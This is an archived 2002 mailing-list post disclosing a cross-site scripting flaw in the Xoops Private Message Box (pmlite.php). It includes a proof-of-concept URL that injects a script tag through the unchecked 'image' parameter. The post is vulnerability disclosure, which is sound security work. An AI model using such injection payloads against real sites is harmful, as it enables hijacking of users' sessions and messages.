OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Cabezon Aurélien (aurelien.cabezonisecurelabs.com)
Date: Tue Jan 29 2002 - 11:09:01 CST

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi again,

    I just found an other Script injection issue in Xoops Private Message Box.

    http://xooped-site/pmlite.php?to_userid=[USER_ID_OF_TARGET]&msg_id=&image=fo
    o.gif'><script>alert("test");</script><img%20src='http://www.isecurelabs.com
    /images/barre.jpg&op=submit&theme=snow&subject=Are you sure
    ?&message=really?&submit=Submit

    Again a lack of checks on users input on the *image* variable.

    To be continued... 

    ---
Cabezon Aurélien | aurelien.cabezonisecurelabs.com
http://www.iSecureLabs.com | French Security Portal

    ____________________________________________
" Sachez qu'aujourd'hui est le plus beau jour de votre vie,
car c'est le premier de ceux qu'il vous reste à vivre "